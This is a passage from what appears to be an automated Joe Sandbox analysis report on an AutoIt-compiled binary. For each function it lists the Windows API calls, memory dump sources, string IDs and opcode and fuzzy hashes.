                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LogonUser
                                                                                                                • String ID:
                                                                                                                • API String ID: 1244722697-0
                                                                                                                • Opcode ID: 68460f258b5b9b99fb5405b1627092cf1bb6811f9bf58bc73fa66ceddb2fa65a
                                                                                                                • Instruction ID: 1458a7464f2eb0506b8e24f20a8b62a3f9d9997f2a14e8507b336bc50935cbc6
                                                                                                                • Opcode Fuzzy Hash: 68460f258b5b9b99fb5405b1627092cf1bb6811f9bf58bc73fa66ceddb2fa65a
                                                                                                                • Instruction Fuzzy Hash: D1D05E320A460EAEDF024FA4EC06EAE3F6AEB04700F408110FA11C50A1C671D531AB50
                                                                                                                Function 0027C146 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: NameUser
                                                                                                                • String ID:
                                                                                                                • API String ID: 2645101109-0
                                                                                                                • Opcode ID: 476b9496c92282c833ad4be41feff487daeec81b90491e8cc353a9ffdc4d9c59
                                                                                                                • Instruction ID: 9c6ee13bb9f20f8111d7b7d904f281340b95b95eeecb405a3849445333f2479a
                                                                                                                • Opcode Fuzzy Hash: 476b9496c92282c833ad4be41feff487daeec81b90491e8cc353a9ffdc4d9c59
                                                                                                                • Instruction Fuzzy Hash: DDC04CB141500DDFCB15DB80D949AEFB7BCBB04300F104095A115E1040D7709B459B76
                                                                                                                Function 00228E19 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00228E1F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                • String ID:
                                                                                                                • API String ID: 3192549508-0
                                                                                                                • Opcode ID: a797097c9dc98947499f76e90f41847ec46742e9a4f60f87ee8b601461ebed38
                                                                                                                • Instruction ID: 3da5675b1a45ae50040c079e9a752d10a11ae3dad4a92bd99f99c27ae913139d
                                                                                                                • Opcode Fuzzy Hash: a797097c9dc98947499f76e90f41847ec46742e9a4f60f87ee8b601461ebed38
                                                                                                                • Instruction Fuzzy Hash: 07A01130000A0CAB8A002BA2FC08888BFACEA082A0B0080A0F80C000228B33A8208A82
                                                                                                                Function 0022A937 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetProcessHeap.KERNEL32(00226AE9,002B67D8,00000014), ref: 0022A937
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HeapProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 54951025-0
                                                                                                                • Opcode ID: c6967ae4069dee72ff726be4598f331c311f8e056e9aa4971f1420cf7efe4e1e
                                                                                                                • Instruction ID: fcefe85b91a2d3edf1364a0652ced5bad0d703b00e365a09d9978763afb0012c
                                                                                                                • Opcode Fuzzy Hash: c6967ae4069dee72ff726be4598f331c311f8e056e9aa4971f1420cf7efe4e1e
                                                                                                                • Instruction Fuzzy Hash: FEB012B83031028BD7084B38BC9C61A3AD45B49101301403D700BC35A1DB308410DF00
                                                                                                                Function 00220EC4 Relevance: .3, Instructions: 345COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                                • Instruction ID: 135a470f61d8a6bd78d28e6be9044efd728f8fe546bc70e9b0fe5a2140d8dc07
                                                                                                                • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                                • Instruction Fuzzy Hash: E6C117722251B359DF2D4ABAD47083EFAA15EB27B135A035DE8B3CB4C1EE24C534D660
                                                                                                                Function 002212F9 Relevance: .3, Instructions: 341COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                                • Instruction ID: 0237fb1cbef714a84c80bed3c6b1f445a02cb784c36695714227a514cf09aef7
                                                                                                                • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                                • Instruction Fuzzy Hash: 8CC118722251B35ADF2D4AB9D47083EFAA15EB27B134A03ADD4B3CB4C5EE24C534C660
                                                                                                                Function 00220A8F Relevance: .3, Instructions: 331COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                • Instruction ID: e18547b4e2e029a58f7fd2d455cacf159d129fa9715fa806b2653806e2c40a93
                                                                                                                • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                • Instruction Fuzzy Hash: F9C127722251B359DF2D4AB9E4B043EFBA15EA27B534A076DD4B3CB0C2EE24C574C660
                                                                                                                Function 00220677 Relevance: .3, Instructions: 323COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                • Instruction ID: 27ea4d26e45724cabea25dccafefa377f244d52ec6a2b136656002ea6cd87d52
                                                                                                                • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                • Instruction Fuzzy Hash: 5FC1F5722251B35ADF2D4AB9A4B443FFBA15EA17B134A036DD4B3CB4C2EE24D534C660
                                                                                                                Function 0025A750 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • DeleteObject.GDI32(00000000), ref: 0025A7A5
                                                                                                                • DeleteObject.GDI32(00000000), ref: 0025A7B7
                                                                                                                • DestroyWindow.USER32 ref: 0025A7C5
                                                                                                                • GetDesktopWindow.USER32 ref: 0025A7DF
                                                                                                                • GetWindowRect.USER32(00000000), ref: 0025A7E6
                                                                                                                • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0025A927
                                                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0025A937
                                                                                                                • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0025A97F
                                                                                                                • GetClientRect.USER32(00000000,?), ref: 0025A98B
                                                                                                                • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0025A9C5
                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0025A9E7
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0025A9FA
                                                                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0025AA05
                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 0025AA0E
                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0025AA1D
                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0025AA26
                                                                                                                • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0025AA2D
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 0025AA38
                                                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0025AA4A
                                                                                                                • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0028D9BC,00000000), ref: 0025AA60
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 0025AA70
                                                                                                                • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0025AA96
                                                                                                                • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0025AAB5
                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0025AAD7
                                                                                                                • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0025ACC4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                • API String ID: 2211948467-2373415609
                                                                                                                • Opcode ID: 32647ece694a67cb154408c31f0a3ce62857d045cc62942348add13ee0f99026
                                                                                                                • Instruction ID: 118c4a751df13fe15f382c4fcfe0cfec2c268c0b53a81ea1407470831c3d842b
                                                                                                                • Opcode Fuzzy Hash: 32647ece694a67cb154408c31f0a3ce62857d045cc62942348add13ee0f99026
                                                                                                                • Instruction Fuzzy Hash: 8D028B75910219EFDB14DF64EC8EEAE7BB9EF48311F108219F905AB2A1D730AD15CB60
                                                                                                                Function 0026D095 Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 0026D0EB
                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 0026D11C
                                                                                                                • GetSysColor.USER32(0000000F), ref: 0026D128
                                                                                                                • SetBkColor.GDI32(?,000000FF), ref: 0026D142
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 0026D151
                                                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 0026D17C
                                                                                                                • GetSysColor.USER32(00000010), ref: 0026D184
                                                                                                                • CreateSolidBrush.GDI32(00000000), ref: 0026D18B
                                                                                                                • FrameRect.USER32(?,?,00000000), ref: 0026D19A
                                                                                                                • DeleteObject.GDI32(00000000), ref: 0026D1A1
                                                                                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 0026D1EC
                                                                                                                • FillRect.USER32(?,?,00000000), ref: 0026D21E
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0026D249
                                                                                                                  • Part of subcall function 0026D385: GetSysColor.USER32(00000012), ref: 0026D3BE
                                                                                                                  • Part of subcall function 0026D385: SetTextColor.GDI32(?,?), ref: 0026D3C2
                                                                                                                  • Part of subcall function 0026D385: GetSysColorBrush.USER32(0000000F), ref: 0026D3D8
                                                                                                                  • Part of subcall function 0026D385: GetSysColor.USER32(0000000F), ref: 0026D3E3
                                                                                                                  • Part of subcall function 0026D385: GetSysColor.USER32(00000011), ref: 0026D400
                                                                                                                  • Part of subcall function 0026D385: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0026D40E
                                                                                                                  • Part of subcall function 0026D385: SelectObject.GDI32(?,00000000), ref: 0026D41F
                                                                                                                  • Part of subcall function 0026D385: SetBkColor.GDI32(?,00000000), ref: 0026D428
                                                                                                                  • Part of subcall function 0026D385: SelectObject.GDI32(?,?), ref: 0026D435
                                                                                                                  • Part of subcall function 0026D385: InflateRect.USER32(?,000000FF,000000FF), ref: 0026D454
                                                                                                                  • Part of subcall function 0026D385: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0026D46B
                                                                                                                  • Part of subcall function 0026D385: GetWindowLongW.USER32(00000000,000000F0), ref: 0026D480
                                                                                                                  • Part of subcall function 0026D385: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0026D4A8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                • String ID:
                                                                                                                • API String ID: 3521893082-0
                                                                                                                • Opcode ID: 17780c77acff0538f27f42e3559fb49a0cd8d813b352a0c53381a2076c669d43
                                                                                                                • Instruction ID: 866b053d97cea4af39fb43f8f8e5c252a77824bde7f3390ba82fc183e4a518a1
                                                                                                                • Opcode Fuzzy Hash: 17780c77acff0538f27f42e3559fb49a0cd8d813b352a0c53381a2076c669d43
                                                                                                                • Instruction Fuzzy Hash: 9291DE76409305BFCB009F64EC0CE6BBBA9FF89320F500A19F966961E0C774D998CB52
                                                                                                                Function 002048C8 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 491windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • DestroyWindow.USER32 ref: 00204956
                                                                                                                • DeleteObject.GDI32(00000000), ref: 00204998
                                                                                                                • DeleteObject.GDI32(00000000), ref: 002049A3
                                                                                                                • DestroyIcon.USER32(00000000), ref: 002049AE
                                                                                                                • DestroyWindow.USER32(00000000), ref: 002049B9
                                                                                                                • SendMessageW.USER32(?,00001308,?,00000000), ref: 0027E179
                                                                                                                • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0027E1B2
                                                                                                                • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0027E5E0
                                                                                                                  • Part of subcall function 002049CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00204954,00000000), ref: 00204A23
                                                                                                                • SendMessageW.USER32 ref: 0027E627
                                                                                                                • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0027E63E
                                                                                                                • ImageList_Destroy.COMCTL32(00000000), ref: 0027E654
                                                                                                                • ImageList_Destroy.COMCTL32(00000000), ref: 0027E65F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 464785882-4108050209
                                                                                                                • Opcode ID: 23c66147aab03759c0b397bc0119f84ac3f0a3817137da7eaf756bfe0df9aa6d
                                                                                                                • Instruction ID: adc47bb455ae1cfe990921277b21222bf1ededf4dc7cc6c5c97b6389bc96efd2
                                                                                                                • Opcode Fuzzy Hash: 23c66147aab03759c0b397bc0119f84ac3f0a3817137da7eaf756bfe0df9aa6d
                                                                                                                • Instruction Fuzzy Hash: 6212B370120206DFDF20DF14C884BA6B7E5BF09304F5585A9F999DB292C731ECA5CBA1
                                                                                                                Function 0025A3F7 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • DestroyWindow.USER32(00000000), ref: 0025A42A
                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0025A4E9
                                                                                                                • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 0025A527
                                                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 0025A539
                                                                                                                • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 0025A57F
                                                                                                                • GetClientRect.USER32(00000000,?), ref: 0025A58B
                                                                                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 0025A5CF
                                                                                                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0025A5DE
                                                                                                                • GetStockObject.GDI32(00000011), ref: 0025A5EE
                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0025A5F2
                                                                                                                • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 0025A602
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0025A60B
                                                                                                                • DeleteDC.GDI32(00000000), ref: 0025A614
                                                                                                                • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0025A642
                                                                                                                • SendMessageW.USER32(00000030,00000000,00000001), ref: 0025A659
                                                                                                                • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 0025A694
                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0025A6A8
                                                                                                                • SendMessageW.USER32(00000404,00000001,00000000), ref: 0025A6B9
                                                                                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0025A6E9
                                                                                                                • GetStockObject.GDI32(00000011), ref: 0025A6F4
                                                                                                                • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 0025A6FF
                                                                                                                • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 0025A709
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                • API String ID: 2910397461-517079104
                                                                                                                • Opcode ID: b29e318a04cd937554af1fa559ea97e5c05a18aab80af78b854360ff9efdc38d
                                                                                                                • Instruction ID: f95d8f6b9c2ea5d37d638fb345a812f395cbca940dd049ac3d787a345f924b1f
                                                                                                                • Opcode Fuzzy Hash: b29e318a04cd937554af1fa559ea97e5c05a18aab80af78b854360ff9efdc38d
                                                                                                                • Instruction Fuzzy Hash: CCA15DB5A50215BFEB14DBA4EC4AFAE7BB9EB05710F004214FA14A72E1D7B0AD14CF64
                                                                                                                Function 0024E44C Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0024E45E
                                                                                                                • GetDriveTypeW.KERNEL32(?,0029DC88,?,\\.\,0029DBF0), ref: 0024E54B
                                                                                                                • SetErrorMode.KERNEL32(00000000,0029DC88,?,\\.\,0029DBF0), ref: 0024E6B1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode$DriveType
                                                                                                                • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                • API String ID: 2907320926-4222207086
